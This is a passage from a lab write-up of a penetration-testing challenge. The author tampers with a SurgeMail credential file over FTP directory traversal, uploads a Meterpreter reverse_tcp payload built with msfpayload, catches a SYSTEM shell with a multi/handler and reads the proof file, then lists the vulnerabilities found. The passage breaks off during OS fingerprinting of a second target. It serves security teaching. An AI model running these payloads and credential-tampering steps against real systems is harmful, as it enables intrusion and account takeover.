803DA8BF442FFF23072386E2B5EF2928\n7443\/tcp <span style=\"color: #0000ff;\">open<\/span>  ssl\/http      Surgemail webmail (DNews based)\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_http-favicon: Unknown favicon MD5: 803DA8BF442FFF23072386E2B5EF2928\n|_html-title: SurgeMail Welcome Page\n1 service unrecognized despite returning <span style=\"color: #0000ff;\">data<\/span>. \nIf you know the service\/<span style=\"color: #0000ff;\">version<\/span>, please submit the following fingerprint \nat http:<span style=\"color: #008000;\">\/\/www.insecure.org\/cgi-bin\/servicefp-submit.cgi :<\/span>\nSF-Port21-TCP:V=5.21%I=7%D=5\/9%Time=4BE68D5E%P=i686-pc-linux-gnu%r(NULL,31\nSF:,\"<span style=\"color: #8b0000;\">220-Complete\\x20FTP\\x20server\\r\\n220\\x20FTP\\x20Server\\x20v\\x203\\.3\\.0\n<\/span>SF:\\r\\n\"<span style=\"color: #8b0000;\">)%r(GenericLines,31,<\/span>\"220-Complete\\x20FTP\\x20server\\r\\n220\\x20FTP\\x\nSF:20Server\\x20v\\x203\\.3\\.0\\r\\n\"<span style=\"color: #8b0000;\">)%r(Help,54,<\/span>\"220-Complete\\x20FTP\\x20server\nSF:\\r\\n220\\x20FTP\\x20Server\\x20v\\x203\\.3\\.0\\r\\n502\\x20Command\\x20not\\x20im\nSF:plemented:\\x20HELP\\r\\n\"<span style=\"color: #8b0000;\">)%r(SMBProgNeg,31,<\/span>\"220-Complete\\x20FTP\\x20server\nSF:\\r\\n220\\x20FTP\\x20Server\\x20v\\x203\\.3\\.0\\r\\n\"<span style=\"color: #8b0000;\">);\n<\/span>Service Info: Host: killthen00b; OS: Windows<\/pre>\n<p>Ok, so we have Qualcomm poppassd, Surgemail and some other stuff.<\/p>\n<p>Where to start ?\u00a0 This is what I did :<\/p>\n<p>Surgemail allows access to certain services via a webpage.\u00a0 Surgemail is a name that showed up a few times in the nmap services list.\u00a0 So it looks like Surgemail is reponsible for the vast majority of the services on this machine.<\/p>\n<p>If you have to pick something to start with, and you see that one application appears to be responsible for most of the services on the machine, then I figured this is a high risk\/high impact service.<\/p>\n<p>In the ftp listing of the root of the drive, I noticed 2 references to Surgemail :<\/p>\n<ul>\n<li>a folder called \"surgemail\"<\/li>\n<li>a file called \"surgemail_installer.exe\"<\/li>\n<\/ul>\n<p>I downloaded the installer file (<em>which was still possible when I was connected to the lab<\/em>) and installed it on a test box.\u00a0 During the installation of surgemail on my test box, I created an admin account (user: admin\/ password: admin) and tried to find the file where the admin username\/password was stored.\u00a0 I discovered that credentials get stored into a file called nwauth.add<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image55.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image55_thumb.png\" alt=\"image\" width=\"529\" height=\"439\" border=\"0\" \/><\/a><\/p>\n<p>So let's see if we can use this to get ourselves an admin account in surgemail on the lab machine... Maybe the hashing\/encoding of the password will work for any account (no salt etc).<\/p>\n<p>Still connected via FTP, I downloaded the nwauth.add file from the server<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......<\/span>\".\nftp&gt; cd surgemail\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/......\/surgemail<\/span>\".\nftp&gt; get nwauth.add\n<span style=\"color: #0000ff;\">local<\/span>: nwauth.add remote: nwauth.add\n200 PORT command successful.\n150 Opening BINARY mode data connection for nwauth.add\n226 Transfer complete.\n227 bytes received in 0.00 secs (152.9 kB\/s)\nftp&gt; bye\n221 Goodbye.\n\nroot@krypt2:\/vpn\/70# cat nwauth.add\nn00b@killthen00b:{ssha}floeVmRUcb7ku3ChQzBdC4acP3ugCInK:created=\"<span style=\"color: #8b0000;\">1272891311<\/span>\" \nmailaccess=\"\" mailstatus=\"\" admin_access=\"\" quota=\"\" expire=\"<span style=\"color: #8b0000;\">0<\/span>\" full_name=\"\" \nmax_in=\"\" phone=\"\" smsto=\"\" user_access=\"\" alias_quota=\"\" list_quota=\"\"<\/pre>\n<p>I simply changed the password for the n00b user, added a new user corelanc0d3r (again with the same \"admin\" hash), and then uploaded the file. I also added a user devil (again with the same password), and uploaded the file again to the server<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">peter@krypt2:\/vpn\/70$ cat nwauth.<span style=\"color: #0000ff;\">add<\/span>\ncorelanc0d3r@killthen00b:{ssha}fqwU1VAdjf6TTr7Av3pUYDxHJ6Y8TQxt:\nn00b@killthen00b:{ssha}fqwU1VAdjf6TTr7Av3pUYDxHJ6Y8TQxt:\ndevil@killthen00b:{ssha}fqwU1VAdjf6TTr7Av3pUYDxHJ6Y8TQxt:<\/pre>\n<p><em>(again, when I performed the exercise, this file was readable and could be downloaded.\u00a0 It looks like muts and his friends got fed up by people trying to change passwords and they finally blocked access to this file) <\/em><\/p>\n<p>Anyways, I uploaded the modified nwauth.add file and tried to log in to the domadmin (Domain Management) page using the \"corelanc0d3r\" and password \"admin\" combination<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image32.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb32.png\" alt=\"image\" width=\"348\" height=\"198\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/70_domadmin1.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"70_domadmin1\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/70_domadmin1_thumb.png\" alt=\"70_domadmin1\" width=\"497\" height=\"311\" border=\"0\" \/><\/a><\/p>\n<p>Result :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/71_domadmin2.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"71_domadmin2\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/71_domadmin2_thumb.png\" alt=\"71_domadmin2\" width=\"370\" height=\"231\" border=\"0\" \/><\/a><\/p>\n<p>Nice.<\/p>\n<p>Let's see if I can create some stuff here (just for fun). I decided to create a little blog and publish it on the server :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/corelanc0d3r_blog.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"corelanc0d3r_blog\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/corelanc0d3r_blog_thumb.png\" alt=\"corelanc0d3r_blog\" width=\"477\" height=\"298\" border=\"0\" \/><\/a><\/p>\n<p>muahaha...\u00a0\u00a0 ok, enough playing.\u00a0\u00a0 So I found a second serious vulnerability on this box.\u00a0 But I should stay focussed and try to 0wn the machine in order to grab the \"secret key\" from the machine, which is what is really needed to complete this challenge. Focus Peter, Focus.<\/p>\n<p>I went back to the surgemail home page and clicked on the \"webmail\" link.<\/p>\n<p>When looking at the WebMail login page, I noticed this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image14.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb14.png\" alt=\"image\" width=\"462\" height=\"241\" border=\"0\" \/><\/a><\/p>\n<p>WebMail appears to be an executable, in the scripts folder.\u00a0 So what if we can put our own executable in this \"scripts\" folder and call it from the web browser ?<\/p>\n<p>First, using metasploit's msfpayload, let's create an evil executable (Meterpreter reverse tcp shell) that would give us a nice shell :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">.\/msfpayload windows\/meterpreter\/reverse_tcp RHOST=192.168.6.114 RPORT=4444 LHOST=192.168.6.114 LPORT=4444 X &gt; _corelanc0d3r.exe<\/pre>\n<p>I then uploaded the file to the scripts folder via the FTP directory traversal bug :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/vpn\/70# ftp 192.168.6.70\nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\nName (192.168.6.70:peter): devil\n331 Password required for devil\nPassword:\n230 User devil logged in.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; cd \\..\\..\\..\\  \n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\nftp&gt; cd surgemail\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/surgemail<\/span>\".\nftp&gt; cd scripts\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......\/surgemail\/scripts<\/span>\".\nftp&gt; bin\n200 Type set to I\nftp&gt; put _corelanc0d3r.exe\nlocal: _corelanc0d3r.exe remote: _corelanc0d3r.exe\n200 PORT command successful.\n150 Opening BINARY mode <span style=\"color: #0000ff;\">data<\/span> connection for _corelanc0d3r.exe\n226 Transfer complete.\n37888 bytes sent in 0.54 secs (69.1 kB\/s)<\/pre>\n<p>Next, set up a metasploit multi handler and listen for incoming connections :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/pentest\/exploits\/framework3# .\/msfcli multi\/handler \n             payload=windows\/meterpreter\/reverse_tcp \n             lhost=192.168.6.114 lport=4444 E\n[*] Please wait while we <span style=\"color: #0000ff;\">load<\/span> the <span style=\"color: #0000ff;\">module<\/span> tree...\n[*] Started reverse handler on port 4444\n[*] Starting the payload handler...<\/pre>\n<p>Finally I called the executable from the web browser :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image15.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb15.png\" alt=\"image\" width=\"527\" height=\"127\" border=\"0\" \/><\/a><\/p>\n<p>and the meterpreter session kicked in :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">[*] Please wait while we <span style=\"color: #0000ff;\">load<\/span> the <span style=\"color: #0000ff;\">module<\/span> tree...\n[*] Started reverse handler on port 4444\n[*] Starting the payload handler...\n[*] Sending stage (725504 bytes)\n[*] Meterpreter session 1 opened (192.168.6.114:4444 -&gt; 192.168.6.70:49604)<\/pre>\n<p>w00t.\u00a0 Game over ? - Maybe...\u00a0 What are my privileges ?<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">meterpreter &gt; getuid\nServer username: NT AUTHORITY\\SYSTEM\nmeterpreter &gt; ipconfig\n\nSoftware Loopback Interface 1\nHardware MAC: 00:00:00:00:00:00\nIP Address  : 127.0.0.1\nNetmask     : 255.0.0.0\n\n\n\nIntel(R) PRO\/1000 MT Network Connection\nHardware MAC: 00:50:56:bc:1c:69\nIP Address  : 192.168.6.70\nNetmask     : 255.255.255.0\n\n\nmeterpreter &gt; shell\nProcess 3656 created.\nChannel 1 created.\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nc:\\surgemail\\scripts&gt;<\/pre>\n<p>Yeah - game over. That's good enough for me.\u00a0 Let's see if we can find the file.<\/p>\n<blockquote><p>Usually, offsec will plant a \"proof\" .txt file on the Desktop of the administrator of the machine.\u00a0 But since I already had a shell, I decided to just list all txt files and see if I could see a file that looks as if it's a proof file.<\/p><\/blockquote>\n<p>I issued a \"dir *.txt \/S\" and evaluated the output, and I found (as expected) the proof file on the desktop of the administrator.<\/p>\n<p>I then used the shell to grab the secret file from the system :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">c:\\surgemail\\scripts&gt;cd \/\ncd \/\n\nc:\\&gt;cd users\ncd users\n\nc:\\Users&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0CDF-A146\n\n Directory of c:\\Users\n\n05\/04\/2010  12:10 AM    &lt;DIR&gt;          .\n05\/04\/2010  12:10 AM    &lt;DIR&gt;          ..\n05\/03\/2010  11:05 PM    &lt;DIR&gt;          Administrator\n05\/04\/2010  12:06 AM    &lt;DIR&gt;          devil\n05\/04\/2010  12:08 AM    &lt;DIR&gt;          ftp\n07\/13\/2009  09:08 PM    &lt;DIR&gt;          Public\n05\/04\/2010  12:10 AM    &lt;DIR&gt;          TEMP\n               0 File(s)              0 bytes\n               7 Dir(s)   2,687,561,728 bytes free\n\nc:\\Users&gt;cd Administrator\ncdcd Administrator\n\nc:\\Users\\Administrator&gt; Desktop\ncd Desktop\n\nc:\\Users\\Administrator\\Desktop&gt;dir\ndir\n Volume in drive C has no label.\n Volume Serial Number is 0CDF-A146\n\n Directory of c:\\Users\\Administrator\\Desktop\n\n05\/03\/2010  11:59 PM    &lt;DIR&gt;          .\n05\/03\/2010  11:59 PM    &lt;DIR&gt;          ..\n05\/03\/2010  11:59 PM                32 proof.txt\n               1 File(s)             32 bytes\n               2 Dir(s)   2,687,496,192 bytes free\n\nc:\\Users\\Administrator\\Desktop&gt;type proof.txt\ntype proof.txt\na61b0c1bf71267289efeecf778b1e51e\nc:\\Users\\Administrator\\Desktop&gt;<\/pre>\n<p>1:10 am. Game over. No need to look any further at this point. I even didn't consider running a full nmap anymore.<\/p>\n<p>What else can be done here ?<\/p>\n<p>Basically,everything you want. Create admin user, rdp into the machine, run hashdump, use this machine to pivot into other machines... etc etc<\/p>\n<p>But I'm a good boy... I just went ahead and submitted the key ...\u00a0 and earned another 25 points.<\/p>\n<p>&nbsp;<\/p>\n<h4>Conclusions :<\/h4>\n<p>I found a number of critical vulnerabilities on this machine.\u00a0 Because of time constraints, as well as the fact that I already owned the machine, I didn't really look any further after I got hold of the proof file<\/p>\n<p>So this list may be far from complete :<\/p>\n<ul>\n<li>FTP server is vulnerable to a directory traversal attack<\/li>\n<li>FTP server allows anonymous access (may not be a vulnerability by itself)<\/li>\n<li>insecure file permissions on the surgemail folder, allowing to download and upload files. This leads to\n<ul>\n<li>the ability to change the login credentials and gain\n<ul>\n<li>admin access to the surgemail system<\/li>\n<li>access to the mailbox of other users.\u00a0 I changed the password of the \"devil\" account as well (set pw to \"admin\"), changed a parameter in the webadmin.ini file, and I could read the mails from this mailbox.\u00a0 The mailbox contained 3 log entries (surgemail server restart notifications, with some interesting info)<\/li>\n<li>etc (use your imagination)<\/li>\n<\/ul>\n<\/li>\n<li>the ability to upload an evil executable into the \"scripts\" folder and executing it in the context of the server, gaining full system access (and allowing to grab the \"proof.txt\" file that contained the secret key)<\/li>\n<\/ul>\n<\/li>\n<li>weak hash\/cipher algo (SSL services allow the use of RC2, MD5, etc, which are considered to be weak)<\/li>\n<li>access to admin pages\/webmail (= potentially sensitive information)\/etc webpages should be forced to use SSL. (While SSL access was possible over port 7443, the default port (80) was not encrypted, and that's what most people might use. Just a simple redirect on port 80, forcing users to use SSL might do the job as well)<\/li>\n<li>Based on the contents of the avast.log file I found on the machine, surgemail may not be protected by avast antivirus<a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image36.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb36.png\" alt=\"image\" width=\"396\" height=\"109\" border=\"0\" \/><\/a><\/li>\n<\/ul>\n<blockquote><p>(In fact, I found a good amount of log files in the surgemail folder - unprotected and waiting to be altered after a comprimise)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image251.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image251_thumb.png\" alt=\"image\" width=\"499\" height=\"53\" border=\"0\" \/><\/a><\/p><\/blockquote>\n<ul>\n<li>Use valid certificates (instead of invalid self-signed certificate)<a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image33.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb33.png\" alt=\"image\" width=\"303\" height=\"53\" border=\"0\" \/><\/a><\/li>\n<li>insecure firewall configurations\n<ul>\n<li>too many ports open (more than needed to host services)<\/li>\n<li>allowing outbound traffic (reverse tunnel) when it's not really necessary (allowing attacker to set up a reverse tunnel)<\/li>\n<\/ul>\n<\/li>\n<li>client facing services running with system privileges, increasing the impact when a vulnerability gets exploited :<\/li>\n<\/ul>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">meterpreter &gt; ps    \n\nProcess list\n============\n\n PID   Name                    Arch  User                          Path\n ---   ----                    ----  ----                          ----\n 0     [System Process]                                            \n 4     System                  x86                                 \n 260   smss.exe                x86   NT AUTHORITY\\SYSTEM           \\SystemRoot\\System32\\smss.exe\n 348   csrss.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\csrss.exe\n 392   wininit.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\wininit.exe\n 480   services.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\services.exe\n 488   lsass.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\lsass.exe\n 500   lsm.exe                 x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\lsm.exe\n 596   svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\svchost.exe\n 668   svchost.exe             x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\svchost.exe\n 760   svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\System32\\svchost.exe\n 816   svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 860   svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\svchost.exe\n 936   svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\system32\\svchost.exe\n 1048  svchost.exe             x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\svchost.exe\n 1160  spoolsv.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\spoolsv.exe\n 1196  svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\system32\\svchost.exe\n 1364  CompleteFTPService.exe  x86   NT AUTHORITY\\SYSTEM           C:\\Program Files\\Complete FTP\\Server\\CompleteFTPService.exe\n 1664  surgemail.exe           x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\surgemail.exe\n 1828  swatch.exe              x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\swatch.exe\n 1884  nwauth.exe              x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\nwauth.exe\n 328   WmiPrvSE.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\wbem\\wmiprvse.exe\n 1304  SearchIndexer.exe       x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\SearchIndexer.exe\n 2260  sppsvc.exe              x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\sppsvc.exe\n 2588  svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 3064  svchost.exe             x86   NT AUTHORITY\\LOCAL SERVICE    C:\\Windows\\system32\\svchost.exe\n 848   csrss.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\csrss.exe\n 748   winlogon.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\winlogon.exe\n 784   LogonUI.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\LogonUI.exe\n 3912  csrss.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\csrss.exe\n 3696  winlogon.exe            x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\winlogon.exe\n 148   taskhost.exe            x86   killthen00b\\Administrator     C:\\Windows\\system32\\taskhost.exe\n 1856  rdpclip.exe             x86   killthen00b\\Administrator     C:\\Windows\\system32\\rdpclip.exe\n 3788  dwm.exe                 x86   killthen00b\\Administrator     C:\\Windows\\system32\\Dwm.exe\n 3916  explorer.exe            x86   killthen00b\\Administrator     C:\\Windows\\Explorer.EXE\n 2000  jusched.exe             x86   killthen00b\\Administrator     C:\\Program Files\\Common Files\\Java\\Java Update\\jusched.exe\n 3152  python.exe              x86   killthen00b\\Administrator     C:\\Python26\\python.exe\n 316   conhost.exe             x86   killthen00b\\Administrator     C:\\Windows\\system32\\conhost.exe\n 884   WmiPrvSE.exe            x86   NT AUTHORITY\\NETWORK SERVICE  C:\\Windows\\system32\\wbem\\wmiprvse.exe\n 3568  _corelanc0d3r.exe       x86   NT AUTHORITY\\SYSTEM           c:\\surgemail\\scripts\\_corelanc0d3r.exe\n 340   VSSVC.exe               x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\system32\\vssvc.exe\n 3968  svchost.exe             x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\System32\\svchost.exe\n 2116  TrustedInstaller.exe    x86   NT AUTHORITY\\SYSTEM           C:\\Windows\\servicing\\TrustedInstaller.exe<\/pre>\n<p>Anyways, there might be many more, but I went straight to the next challenge.<\/p>\n<p>(Based on <a title=\"http:\/\/www.exploit-db.com\/exploits\/5259\" href=\"http:\/\/www.exploit-db.com\/exploits\/5259\">http:\/\/www.exploit-db.com\/exploits\/5259<\/a>, the IMAP service, for example, may be vulnerable to a post AUTH bug.\u00a0 Since I have been able to change passwords for surgemail accounts, it may have been possible to exploit this bug and use it to gain system access again. But I didn't try, because I already had achieved the goal : get the key from the text file.<\/p>\n<blockquote><p>Note : the admin who set up this machine should either get trained, or fired. Does anyone know a decent training facility ?<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>Challenge 2 : Ghost<\/h3>\n<p>This was a fun but painful\/hard one. In addition to that (and unfortunately for me), I had to spend most of the day (monday) in the hospital...<\/p>\n<p>I was happy to see that my friends at Corelan Team continued their evil work in the meantime.\u00a0 And it also was nice to see that they applied the same logic and scripts\/exploits that I was using\/trying.\u00a0 So they nailed the challenge before I could... and that's awesome.<\/p>\n<p>This is what I did to \"bust Ghost\" :<\/p>\n<p>A portscan against 192.168.6.66\/67\/68 revealed only one open port: tcp\/80 (http), serving a webpage that looks like this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image68.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image68_thumb.png\" alt=\"image\" width=\"475\" height=\"307\" border=\"0\" \/><\/a><\/p>\n<p>Apparently the person\/people who set up this box, tried very hard (<em>not hard enough though<\/em>) to make it look like an MS IIS server :<\/p>\n<ul>\n<li>they changed the server header<\/li>\n<li>they planted well-known folder structures on the server which are available on some IIS servers<\/li>\n<li>they used asp file extension, which is usually linked to IIS (or Java Web Server)<\/li>\n<\/ul>\n<p>On top of that, they planted all kinds of \"slow down\"\/fake exercises (such as a nice script file called \"javascript\", basically randomizing the selection of pictures)), and used some nice redirection techniques to make directory\/file bruteforcing a real pain.<\/p>\n<p>But I quickly figured out that this is not a Windows box running IIS. I did some folder bruteforcing and after filtering out some of the redirects I found some interesting folders.\u00a0 One of the folders displayed a basic folder browser (basically looking like something that is served via IIS) : http:\/\/192.168.6.66\/Sites<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image17.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb17.png\" alt=\"image\" width=\"217\" height=\"184\" border=\"0\" \/><\/a><\/p>\n<p>They even planted an file called \"ViewCode.asp\" on the server (size 0), probably in an attempt to slow down the attackers process and make them focus on a known bug (but something that isn't real)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image18.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb18.png\" alt=\"image\" width=\"338\" height=\"184\" border=\"0\" \/><\/a><\/p>\n<p>Nice try, but not good enough to convince me.<\/p>\n<p>On top of that, a quick xprobe also indicates that this is a linux box :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">root@krypt2:\/pentest\/enumeration# xprobe2 -v -p tcp:80:<span style=\"color: #0000ff;\">open<\/span> 192.168.6.66\n\nXprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu\n\n[+] Target is 192.168.6.66\n[+] Loading modules.\n[+] Following modules are loaded:\n[x] [1] ping:icmp_ping  -  ICMP echo discovery module\n[x] [2] ping:tcp_ping  -  TCP-based ping discovery module\n[x] [3] ping:udp_ping  -  UDP-based ping discovery module\n[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation\n[x] [5] infogather:portscan  -  TCP and UDP PortScanner\n[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module\n[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module\n[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module\n[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module\n[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module\n[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module\n[x] [12] fingerprint:smb  -  SMB fingerprinting module\n[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module\n[+] 13 modules registered\n[+] Initializing scan engine\n[+] Running scan engine\n[-] ping:udp_ping module: <span style=\"color: #0000ff;\">no<\/span> closed\/<span style=\"color: #0000ff;\">open<\/span> UDP ports known on 192.168.6.66. <span style=\"color: #0000ff;\">Module<\/span> test failed\n[+] Host: 192.168.6.66 is up (Guess probability: 66%)\n[+] Target: 192.168.6.66 is alive. Round-Trip Time: 0.25938 sec\n[+] Selected safe Round-Trip Time <span style=\"color: #0000ff;\">value<\/span> is: 0.51877 sec\n[-] fingerprint:smb need either TCP port 139 or 445 to run\n[-] fingerprint:snmp: need UDP port 161 <span style=\"color: #0000ff;\">open<\/span>\n[+] Primary guess:\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.10<\/span>\" (Guess probability: 86%)\n[+] Other guesses:\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.21<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.12<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.19<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.14<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.17<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.16<\/span>\" (Guess probability: 86%)\n[+] Host 192.168.6.66 Running OS: \"<span style=\"color: #8b0000;\">Linux Kernel 2.4.15<\/span>\" (Guess probability: 86%)\n[+] Host 